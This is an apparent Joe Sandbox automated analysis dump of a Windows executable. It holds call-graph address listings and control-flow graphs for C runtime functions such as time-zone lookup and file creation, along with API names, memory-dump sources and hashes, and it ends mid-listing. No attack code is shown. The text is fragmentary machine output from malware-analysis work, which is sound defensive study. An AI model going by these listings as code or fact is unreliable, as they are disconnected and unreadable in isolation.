7ff6e60b430e 17262->17263 17264 7ff6e60beb30 46 API calls 17263->17264 17271 7ff6e60b4609 17270->17271 17272 7ff6e60b464e 17271->17272 17273 7ff6e60b4627 17271->17273 17274 7ff6e60b4900 45 API calls 17271->17274 17272->17206 17275 7ff6e60befc8 46 API calls 17273->17275 17274->17273 17275->17272 17277 7ff6e60b1ec7 17276->17277 17278 7ff6e60b1ef6 17277->17278 17280 7ff6e60b1fb3 17277->17280 17282 7ff6e60b1f33 17278->17282 17313 7ff6e60b0d68 17278->17313 17281 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 17280->17281 17281->17282 17282->17206 17284 7ff6e60b1ab7 17283->17284 17285 7ff6e60b1ae6 17284->17285 17287 7ff6e60b1ba3 17284->17287 17286 7ff6e60b0d68 12 API calls 17285->17286 17289 7ff6e60b1b23 17285->17289 17286->17289 17288 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 17287->17288 17288->17289 17289->17206 17291 7ff6e60b482f 17290->17291 17293 7ff6e60b4833 __crtLCMapStringW 17291->17293 17321 7ff6e60b4888 17291->17321 17293->17206 17295 7ff6e60b22d7 17294->17295 17296 7ff6e60b2306 17295->17296 17298 7ff6e60b23c3 17295->17298 17297 7ff6e60b0d68 12 API calls 17296->17297 17300 7ff6e60b2343 17296->17300 17297->17300 17299 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 17298->17299 17299->17300 17300->17206 17302 7ff6e60beff9 17301->17302 17310 7ff6e60bf007 17301->17310 17303 7ff6e60bf027 17302->17303 17304 7ff6e60b4900 45 API calls 17302->17304 17302->17310 17305 7ff6e60bf05f 17303->17305 17306 7ff6e60bf038 17303->17306 17304->17303 17305->17310 17310->17219 17314 7ff6e60b0d8e 17313->17314 17315 7ff6e60b0d9f 17313->17315 17314->17282 17315->17314 17316 7ff6e60bdbbc _fread_nolock 12 API calls 17315->17316 17317 7ff6e60b0dd0 17316->17317 17322 7ff6e60b48a6 17321->17322 17324 7ff6e60b48ae 17321->17324 17323 7ff6e60b4900 45 API calls 17322->17323 17323->17324 17324->17293 17333 7ff6e60b114f 17332->17333 17334 7ff6e60b113d 17332->17334 17336 7ff6e60b1199 17333->17336 17337 7ff6e60b115d 17333->17337 17335 7ff6e60b54c4 _set_fmode 11 API calls 17334->17335 17338 7ff6e60b1142 17335->17338 17341 7ff6e60b1515 17336->17341 17343 7ff6e60b54c4 _set_fmode 11 API calls 17336->17343 17339 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 17337->17339 17340 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 17338->17340 17346 7ff6e60b114d 17339->17346 17340->17346 17342 7ff6e60b54c4 _set_fmode 11 API calls 17341->17342 17341->17346 17344 7ff6e60b17a9 17342->17344 17345 7ff6e60b150a 17343->17345 17347 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 17344->17347 17348 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 17345->17348 17346->17183 17347->17346 17348->17341 17390 7ff6e60c1bc8 17349->17390 17449 7ff6e60c1940 17390->17449 17470 7ff6e60c0cb8 EnterCriticalSection 17449->17470 17476 7ff6e60a8675 17475->17476 17477 7ff6e60b4d18 48 API calls 17476->17477 17478 7ff6e60a8698 LocalFree ConvertStringSecurityDescriptorToSecurityDescriptorW 17477->17478 17480 7ff6e60b79f5 17479->17480 17481 7ff6e60b79c2 17479->17481 17480->17142 17481->17480 17482 7ff6e60c0e54 _wfindfirst32i64 37 API calls 17481->17482 17483 7ff6e60b79f1 17482->17483 17483->17480 17484 7ff6e60baec4 _wfindfirst32i64 17 API calls 17483->17484 17485 7ff6e60b7a25 17484->17485 17487 7ff6e60b6344 17486->17487 17488 7ff6e60b63b2 17486->17488 17487->17488 17490 7ff6e60b6349 17487->17490 17523 7ff6e60c04a0 17488->17523 17491 7ff6e60b6361 17490->17491 17492 7ff6e60b637e 17490->17492 17498 7ff6e60b60f8 GetFullPathNameW 17491->17498 17506 7ff6e60b616c GetFullPathNameW 17492->17506 17497 7ff6e60b6376 __std_exception_copy 17497->17142 17499 7ff6e60b611e GetLastError 17498->17499 17502 7ff6e60b6134 17498->17502 17500 7ff6e60b5438 _fread_nolock 11 API calls 17499->17500 17501 7ff6e60b612b 17500->17501 17503 7ff6e60b54c4 _set_fmode 11 API calls 17501->17503 17504 7ff6e60b54c4 _set_fmode 11 API calls 17502->17504 17505 7ff6e60b6130 17502->17505 17503->17505 17504->17505 17505->17497 17507 7ff6e60b619f GetLastError 17506->17507 17510 7ff6e60b61b5 __std_exception_copy 17506->17510 17508 7ff6e60b5438 _fread_nolock 11 API calls 17507->17508 17509 7ff6e60b61ac 17508->17509 17512 7ff6e60b54c4 _set_fmode 11 API calls 17509->17512 17511 7ff6e60b61b1 17510->17511 17513 7ff6e60b620f GetFullPathNameW 17510->17513 17514 7ff6e60b6244 17511->17514 17512->17511 17513->17507 17513->17511 17515 7ff6e60b62b8 memcpy_s 17514->17515 17518 7ff6e60b626d __scrt_get_show_window_mode 17514->17518 17515->17497 17518->17515 17526 7ff6e60c02b0 17523->17526 17527 7ff6e60c02f2 17526->17527 17528 7ff6e60c02db 17526->17528 17529 7ff6e60c0317 17527->17529 17530 7ff6e60c02f6 17527->17530 17531 7ff6e60b54c4 _set_fmode 11 API calls 17528->17531 17564 7ff6e60bf918 17529->17564 17552 7ff6e60c041c 17530->17552 17546 7ff6e60c02e0 17531->17546 17537 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 17551 7ff6e60c02eb __std_exception_copy 17537->17551 17542 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17546->17537 17551->17542 17553 7ff6e60c0466 17552->17553 17554 7ff6e60c0436 17552->17554 17556 7ff6e60c0471 GetDriveTypeW 17553->17556 17557 7ff6e60c0451 17553->17557 17555 7ff6e60b54a4 _fread_nolock 11 API calls 17554->17555 17558 7ff6e60c043b 17555->17558 17556->17557 17560 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17557->17560 17565 7ff6e60ad0e0 __scrt_get_show_window_mode 17564->17565 17566 7ff6e60bf94e GetCurrentDirectoryW 17565->17566 17567 7ff6e60bf965 17566->17567 17568 7ff6e60bf98c 17566->17568 17585 7ff6e60c0cb8 EnterCriticalSection 17578->17585 17587 7ff6e60a173e 17586->17587 17588 7ff6e60a1726 17586->17588 17590 7ff6e60a1744 17587->17590 17591 7ff6e60a1768 17587->17591 17589 7ff6e60a2b30 59 API calls 17588->17589 17592 7ff6e60a1732 17589->17592 17716 7ff6e60a12b0 17590->17716 17679 7ff6e60a7c10 17591->17679 17592->16414 17597 7ff6e60a175f 17597->16414 17598 7ff6e60a17b9 17600 7ff6e60a3fd0 116 API calls 17598->17600 17599 7ff6e60a178d 17602 7ff6e60a2890 59 API calls 17599->17602 17603 7ff6e60a17ce 17600->17603 17601 7ff6e60a2b30 59 API calls 17601->17597 17604 7ff6e60a17a3 17602->17604 17605 7ff6e60a17ee 17603->17605 17606 7ff6e60a17d6 17603->17606 17604->16414 17608 7ff6e60b0814 73 API calls 17605->17608 17607 7ff6e60a2b30 59 API calls 17606->17607 17609 7ff6e60a17e5 17607->17609 17610 7ff6e60a17ff 17608->17610 17629 7ff6e60a2d86 17628->17629 17630 7ff6e60a1ef0 49 API calls 17629->17630 17631 7ff6e60a2db9 17630->17631 17632 7ff6e60a3e40 49 API calls 17631->17632 17678 7ff6e60a30ea 17631->17678 17633 7ff6e60a2e27 17632->17633 17634 7ff6e60a3e40 49 API calls 17633->17634 17635 7ff6e60a2e38 17634->17635 17636 7ff6e60a2e95 17635->17636 17637 7ff6e60a2e59 17635->17637 17638 7ff6e60a31b0 75 API calls 17636->17638 17851 7ff6e60a31b0 17637->17851 17640 7ff6e60a2e93 17638->17640 17641 7ff6e60a2ed4 17640->17641 17642 7ff6e60a2f16 17640->17642 17859 7ff6e60a75a0 17641->17859 17644 7ff6e60a31b0 75 API calls 17642->17644 17646 7ff6e60a2f40 17644->17646 17650 7ff6e60a31b0 75 API calls 17646->17650 17656 7ff6e60a2fdc 17646->17656 17680 7ff6e60a7c20 17679->17680 17681 7ff6e60a1ef0 49 API calls 17680->17681 17682 7ff6e60a7c61 17681->17682 17696 7ff6e60a7ce1 17682->17696 17759 7ff6e60a3f60 17682->17759 17684 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17686 7ff6e60a1785 17684->17686 17686->17598 17686->17599 17687 7ff6e60a7d1b 17765 7ff6e60a77c0 17687->17765 17689 7ff6e60a7cd0 17779 7ff6e60a2c50 17689->17779 17690 7ff6e60a7b60 61 API calls 17697 7ff6e60a7c92 __std_exception_copy 17690->17697 17693 7ff6e60a2c50 59 API calls 17693->17687 17694 7ff6e60a7d04 17694->17693 17696->17684 17697->17689 17697->17694 17717 7ff6e60a12c2 17716->17717 17718 7ff6e60a3fd0 116 API calls 17717->17718 17719 7ff6e60a12f2 17718->17719 17720 7ff6e60a1311 17719->17720 17721 7ff6e60a12fa 17719->17721 17722 7ff6e60b0814 73 API calls 17720->17722 17723 7ff6e60a2b30 59 API calls 17721->17723 17724 7ff6e60a1323 17722->17724 17728 7ff6e60a130a __std_exception_copy 17723->17728 17725 7ff6e60a1327 17724->17725 17726 7ff6e60a134d 17724->17726 17727 7ff6e60a2890 59 API calls 17725->17727 17732 7ff6e60a1390 17726->17732 17733 7ff6e60a1368 17726->17733 17729 7ff6e60a133e 17727->17729 17730 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17728->17730 17731 7ff6e60b018c 74 API calls 17729->17731 17736 7ff6e60a1454 17730->17736 17731->17728 17734 7ff6e60a1463 17732->17734 17735 7ff6e60a13aa 17732->17735 17737 7ff6e60a2890 59 API calls 17733->17737 17745 7ff6e60b04dc _fread_nolock 53 API calls 17734->17745 17748 7ff6e60a14bb 17734->17748 17750 7ff6e60a13c3 17734->17750 17738 7ff6e60a1050 98 API calls 17735->17738 17736->17597 17736->17601 17739 7ff6e60a1383 17737->17739 17740 7ff6e60a13bb 17738->17740 17742 7ff6e60b018c 74 API calls 17739->17742 17743 7ff6e60a14d2 __std_exception_copy 17740->17743 17740->17750 17741 7ff6e60b018c 74 API calls 17744 7ff6e60a13cf 17741->17744 17742->17728 17745->17734 17751 7ff6e60a2890 59 API calls 17748->17751 17750->17741 17751->17743 17760 7ff6e60a3f6a 17759->17760 17761 7ff6e60a8ae0 57 API calls 17760->17761 17762 7ff6e60a3f92 17761->17762 17763 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17762->17763 17764 7ff6e60a3fba 17763->17764 17764->17687 17764->17690 17764->17697 17852 7ff6e60a31e4 17851->17852 17853 7ff6e60b4ac4 49 API calls 17852->17853 17854 7ff6e60a320a 17853->17854 17855 7ff6e60a321b 17854->17855 17911 7ff6e60b5dec 17854->17911 17857 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17855->17857 17858 7ff6e60a3239 17857->17858 17858->17640 17860 7ff6e60a75ae 17859->17860 17861 7ff6e60a3fd0 116 API calls 17860->17861 17862 7ff6e60a75dd 17861->17862 17912 7ff6e60b5e15 17911->17912 17913 7ff6e60b5e09 17911->17913 18126 7ff6e60b63dc 18123->18126 18124 7ff6e60b6402 18125 7ff6e60b54c4 _set_fmode 11 API calls 18124->18125 18127 7ff6e60b6407 18125->18127 18126->18124 18128 7ff6e60b6435 18126->18128 18131 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 18127->18131 18129 7ff6e60b6448 18128->18129 18130 7ff6e60b643b 18128->18130 18142 7ff6e60bb1ec 18129->18142 18132 7ff6e60b54c4 _set_fmode 11 API calls 18130->18132 18134 7ff6e60a4029 18131->18134 18132->18134 18134->16488 18155 7ff6e60c0cb8 EnterCriticalSection 18142->18155 18503 7ff6e60b90a0 18502->18503 18506 7ff6e60b8b7c 18503->18506 18507 7ff6e60b8b97 18506->18507 18508 7ff6e60b8bc6 18506->18508 18510 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 18507->18510 18516 7ff6e60b536c EnterCriticalSection 18508->18516 18518 7ff6e60affb1 18517->18518 18519 7ff6e60aff83 18517->18519 18529 7ff6e60a3fd0 116 API calls 18528->18529 18530 7ff6e60a15c7 18529->18530 18531 7ff6e60a15cf 18530->18531 18532 7ff6e60a15f0 18530->18532 18533 7ff6e60a2b30 59 API calls 18531->18533 18534 7ff6e60b0814 73 API calls 18532->18534 18536 7ff6e60a15df 18533->18536 18535 7ff6e60a1601 18534->18535 18537 7ff6e60a1621 18535->18537 18538 7ff6e60a1605 18535->18538 18536->16507 18540 7ff6e60a1651 18537->18540 18541 7ff6e60a1631 18537->18541 18539 7ff6e60a2890 59 API calls 18538->18539 18550 7ff6e60a161c __std_exception_copy 18539->18550 18543 7ff6e60a1666 18540->18543 18548 7ff6e60a167d 18540->18548 18542 7ff6e60a2890 59 API calls 18541->18542 18542->18550 18545 7ff6e60a1050 98 API calls 18543->18545 18544 7ff6e60b018c 74 API calls 18546 7ff6e60a16f7 18544->18546 18545->18550 18546->16507 18547 7ff6e60b04dc _fread_nolock 53 API calls 18547->18548 18548->18547 18549 7ff6e60a16be 18548->18549 18548->18550 18551 7ff6e60a2890 59 API calls 18549->18551 18550->18544 18551->18550 18554 7ff6e60a19d3 18552->18554 18555 7ff6e60a196f 18552->18555 18553 7ff6e60b5070 45 API calls 18553->18555 18554->16517 18555->18553 18555->18554 18557 7ff6e60a8ae0 57 API calls 18556->18557 18558 7ff6e60a8277 LoadLibraryExW 18557->18558 18559 7ff6e60a8294 __std_exception_copy 18558->18559 18559->16534 18620 7ff6e60a5bd0 18619->18620 18621 7ff6e60a1ef0 49 API calls 18620->18621 18622 7ff6e60a5c02 18621->18622 18623 7ff6e60a5c2b 18622->18623 18624 7ff6e60a5c0b 18622->18624 18625 7ff6e60a5c82 18623->18625 18627 7ff6e60a4050 49 API calls 18623->18627 18626 7ff6e60a2b30 59 API calls 18624->18626 18628 7ff6e60a4050 49 API calls 18625->18628 18646 7ff6e60a5c21 18626->18646 18629 7ff6e60a5c4c 18627->18629 18630 7ff6e60a5c9b 18628->18630 18631 7ff6e60a5c6a 18629->18631 18636 7ff6e60a2b30 59 API calls 18629->18636 18633 7ff6e60a5cb9 18630->18633 18634 7ff6e60a2b30 59 API calls 18630->18634 18637 7ff6e60a3f60 57 API calls 18631->18637 18632 7ff6e60abcc0 _wfindfirst32i64 8 API calls 18638 7ff6e60a346e 18632->18638 18635 7ff6e60a8260 58 API calls 18633->18635 18634->18633 18639 7ff6e60a5cc6 18635->18639 18636->18631 18640 7ff6e60a5c74 18637->18640 18638->16555 18647 7ff6e60a5d20 18638->18647 18641 7ff6e60a5ccb 18639->18641 18642 7ff6e60a5ced 18639->18642 18640->18625 18645 7ff6e60a8260 58 API calls 18640->18645 18643 7ff6e60a29e0 57 API calls 18641->18643 18717 7ff6e60a51e0 GetProcAddress 18642->18717 18643->18646 18645->18625 18646->18632 18801 7ff6e60a4de0 18647->18801 18649 7ff6e60a5d44 18650 7ff6e60a5d5d 18649->18650 18651 7ff6e60a5d4c 18649->18651 18808 7ff6e60a4530 18650->18808 18653 7ff6e60a2b30 59 API calls 18651->18653 18718 7ff6e60a5220 GetProcAddress 18717->18718 18719 7ff6e60a5202 18717->18719 18718->18719 18720 7ff6e60a5245 GetProcAddress 18718->18720 18721 7ff6e60a29e0 57 API calls 18719->18721 18720->18719 18722 7ff6e60a526a GetProcAddress 18720->18722 18722->18719 18803 7ff6e60a4e05 18801->18803 18802 7ff6e60a4e0d 18802->18649 18803->18802 18804 7ff6e60a4f9f 18803->18804 18843 7ff6e60b6fb8 18803->18843 18805 7ff6e60a514a __std_exception_copy 18804->18805 18806 7ff6e60a4250 47 API calls 18804->18806 18805->18649 18806->18804 18844 7ff6e60b6fe8 18843->18844 18847 7ff6e60b64b4 18844->18847 18848 7ff6e60b64e5 18847->18848 18849 7ff6e60b64f7 18847->18849 19884 7ff6e60c1d20 19895 7ff6e60c7cb4 19884->19895 19896 7ff6e60c7cc1 19895->19896 19897 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19896->19897 19898 7ff6e60c7cdd 19896->19898 19897->19896 19899 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19898->19899 19900 7ff6e60c1d29 19898->19900 19899->19898 19901 7ff6e60c0cb8 EnterCriticalSection 19900->19901

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 133 7ff6e60c6370-7ff6e60c63ab call 7ff6e60c5cf8 call 7ff6e60c5d00 call 7ff6e60c5d68 140 7ff6e60c63b1-7ff6e60c63bc call 7ff6e60c5d08 133->140 141 7ff6e60c65d5-7ff6e60c6621 call 7ff6e60baec4 call 7ff6e60c5cf8 call 7ff6e60c5d00 call 7ff6e60c5d68 133->141 140->141 147 7ff6e60c63c2-7ff6e60c63cc 140->147 166 7ff6e60c675f-7ff6e60c67cd call 7ff6e60baec4 call 7ff6e60c1be8 141->166 167 7ff6e60c6627-7ff6e60c6632 call 7ff6e60c5d08 141->167 148 7ff6e60c63ee-7ff6e60c63f2 147->148 149 7ff6e60c63ce-7ff6e60c63d1 147->149 153 7ff6e60c63f5-7ff6e60c63fd 148->153 151 7ff6e60c63d4-7ff6e60c63df 149->151 154 7ff6e60c63e1-7ff6e60c63e8 151->154 155 7ff6e60c63ea-7ff6e60c63ec 151->155 153->153 157 7ff6e60c63ff-7ff6e60c6412 call 7ff6e60bdbbc 153->157 154->151 154->155 155->148 158 7ff6e60c641b-7ff6e60c6429 155->158 164 7ff6e60c6414-7ff6e60c6416 call 7ff6e60baf0c 157->164 165 7ff6e60c642a-7ff6e60c6436 call 7ff6e60baf0c 157->165 164->158 175 7ff6e60c643d-7ff6e60c6445 165->175 186 7ff6e60c67cf-7ff6e60c67d6 166->186 187 7ff6e60c67db-7ff6e60c67de 166->187 167->166 177 7ff6e60c6638-7ff6e60c6643 call 7ff6e60c5d38 167->177 175->175 176 7ff6e60c6447-7ff6e60c6458 call 7ff6e60c0e54 175->176 176->141 185 7ff6e60c645e-7ff6e60c64b4 call 7ff6e60ad0e0 * 4 call 7ff6e60c628c 176->185 177->166 188 7ff6e60c6649-7ff6e60c666c call 7ff6e60baf0c GetTimeZoneInformation 177->188 246 7ff6e60c64b6-7ff6e60c64ba 185->246 190 7ff6e60c686b-7ff6e60c686e 186->190 191 7ff6e60c67e0 187->191 192 7ff6e60c6815-7ff6e60c6828 call 7ff6e60bdbbc 187->192 200 7ff6e60c6734-7ff6e60c675e call 7ff6e60c5cf0 call 7ff6e60c5ce0 call 7ff6e60c5ce8 188->200 201 7ff6e60c6672-7ff6e60c6693 188->201 196 7ff6e60c67e3 call 7ff6e60c65ec 190->196 197 7ff6e60c6874-7ff6e60c687c call 7ff6e60c6370 190->197 191->196 208 7ff6e60c6833-7ff6e60c684e call 7ff6e60c1be8 192->208 209 7ff6e60c682a 192->209 212 7ff6e60c67e8-7ff6e60c6814 call 7ff6e60baf0c call 7ff6e60abcc0 196->212 197->212 206 7ff6e60c669e-7ff6e60c66a5 201->206 207 7ff6e60c6695-7ff6e60c669b 201->207 213 7ff6e60c66b9 206->213 214 7ff6e60c66a7-7ff6e60c66af 206->214 207->206 230 7ff6e60c6850-7ff6e60c6853 208->230 231 7ff6e60c6855-7ff6e60c6867 call 7ff6e60baf0c 208->231 215 7ff6e60c682c-7ff6e60c6831 call 7ff6e60baf0c 209->215 225 7ff6e60c66bb-7ff6e60c672f call 7ff6e60ad0e0 * 4 call 7ff6e60c31cc call 7ff6e60c6884 * 2 213->225 214->213 220 7ff6e60c66b1-7ff6e60c66b7 214->220 215->191 220->225 225->200 230->215 231->190 248 7ff6e60c64c0-7ff6e60c64c4 246->248 249 7ff6e60c64bc 246->249 248->246 250 7ff6e60c64c6-7ff6e60c64eb call 7ff6e60b706c 248->250 249->248 256 7ff6e60c64ee-7ff6e60c64f2 250->256 259 7ff6e60c6501-7ff6e60c6505 256->259 260 7ff6e60c64f4-7ff6e60c64ff 256->260 259->256 260->259 262 7ff6e60c6507-7ff6e60c650b 260->262 264 7ff6e60c650d-7ff6e60c6535 call 7ff6e60b706c 262->264 265 7ff6e60c658c-7ff6e60c6590 262->265 273 7ff6e60c6553-7ff6e60c6557 264->273 274 7ff6e60c6537 264->274 266 7ff6e60c6592-7ff6e60c6594 265->266 267 7ff6e60c6597-7ff6e60c65a4 265->267 266->267 269 7ff6e60c65bf-7ff6e60c65ce call 7ff6e60c5cf0 call 7ff6e60c5ce0 267->269 270 7ff6e60c65a6-7ff6e60c65bc call 7ff6e60c628c 267->270 269->141 270->269 273->265 279 7ff6e60c6559-7ff6e60c6577 call 7ff6e60b706c 273->279 277 7ff6e60c653a-7ff6e60c6541 274->277 277->273 281 7ff6e60c6543-7ff6e60c6551 277->281 285 7ff6e60c6583-7ff6e60c658a 279->285 281->273 281->277 285->265 286 7ff6e60c6579-7ff6e60c657d 285->286 286->265 287 7ff6e60c657f 286->287 287->285
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6E60C63B5
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60C5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D1C
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60BAF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF22
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60BAF0C: GetLastError.KERNEL32(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF2C
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60BAEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6E60BAEA3,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BAECD
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60BAEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6E60BAEA3,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BAEF2
                                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6E60C63A4
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60C5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D7C
                                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6E60C661A
                                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6E60C662B
                                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6E60C663C
                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E60C687C), ref: 00007FF6E60C6663
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                              • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                              • Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                                                                                                                                                                                                                              • Instruction ID: 4c568b934d46a0f98d2b2e5b9c14b5857409f8f292d2990d5e003d9501617b98
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AD1D227A3822286EB20DF25DA507B96751EF84784F408135EA0ECB6C6DF3FE451C75A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 318 7ff6e60c72bc-7ff6e60c732f call 7ff6e60c6ff0 321 7ff6e60c7331-7ff6e60c733a call 7ff6e60b54a4 318->321 322 7ff6e60c7349-7ff6e60c7353 call 7ff6e60b8434 318->322 327 7ff6e60c733d-7ff6e60c7344 call 7ff6e60b54c4 321->327 328 7ff6e60c736e-7ff6e60c73d7 CreateFileW 322->328 329 7ff6e60c7355-7ff6e60c736c call 7ff6e60b54a4 call 7ff6e60b54c4 322->329 345 7ff6e60c768a-7ff6e60c76aa 327->345 330 7ff6e60c7454-7ff6e60c745f GetFileType 328->330 331 7ff6e60c73d9-7ff6e60c73df 328->331 329->327 337 7ff6e60c7461-7ff6e60c749c GetLastError call 7ff6e60b5438 CloseHandle 330->337 338 7ff6e60c74b2-7ff6e60c74b9 330->338 334 7ff6e60c7421-7ff6e60c744f GetLastError call 7ff6e60b5438 331->334 335 7ff6e60c73e1-7ff6e60c73e5 331->335 334->327 335->334 343 7ff6e60c73e7-7ff6e60c741f CreateFileW 335->343 337->327 353 7ff6e60c74a2-7ff6e60c74ad call 7ff6e60b54c4 337->353 341 7ff6e60c74c1-7ff6e60c74c4 338->341 342 7ff6e60c74bb-7ff6e60c74bf 338->342 348 7ff6e60c74ca-7ff6e60c751f call 7ff6e60b834c 341->348 349 7ff6e60c74c6 341->349 342->348 343->330 343->334 356 7ff6e60c7521-7ff6e60c752d call 7ff6e60c71f8 348->356 357 7ff6e60c753e-7ff6e60c756f call 7ff6e60c6d70 348->357 349->348 353->327 356->357 365 7ff6e60c752f 356->365 363 7ff6e60c7571-7ff6e60c7573 357->363 364 7ff6e60c7575-7ff6e60c75b7 357->364 366 7ff6e60c7531-7ff6e60c7539 call 7ff6e60bb084 363->366 367 7ff6e60c75d9-7ff6e60c75e4 364->367 368 7ff6e60c75b9-7ff6e60c75bd 364->368 365->366 366->345 370 7ff6e60c7688 367->370 371 7ff6e60c75ea-7ff6e60c75ee 367->371 368->367 369 7ff6e60c75bf-7ff6e60c75d4 368->369 369->367 370->345 371->370 373 7ff6e60c75f4-7ff6e60c7639 CloseHandle CreateFileW 371->373 375 7ff6e60c766e-7ff6e60c7683 373->375 376 7ff6e60c763b-7ff6e60c7669 GetLastError call 7ff6e60b5438 call 7ff6e60b8574 373->376 375->370 376->375
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                                                              • Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                                                                                                                                                                                                                              • Instruction ID: 99d2ce4d52e97171e384ef33b961c4aaa580d0946cf0b929439f2235ec243fb1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26C1A037B34A5285EB11CF68C5902AC3B61FB48BA8B114225DE2F9B3E5CF3AD456C315

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
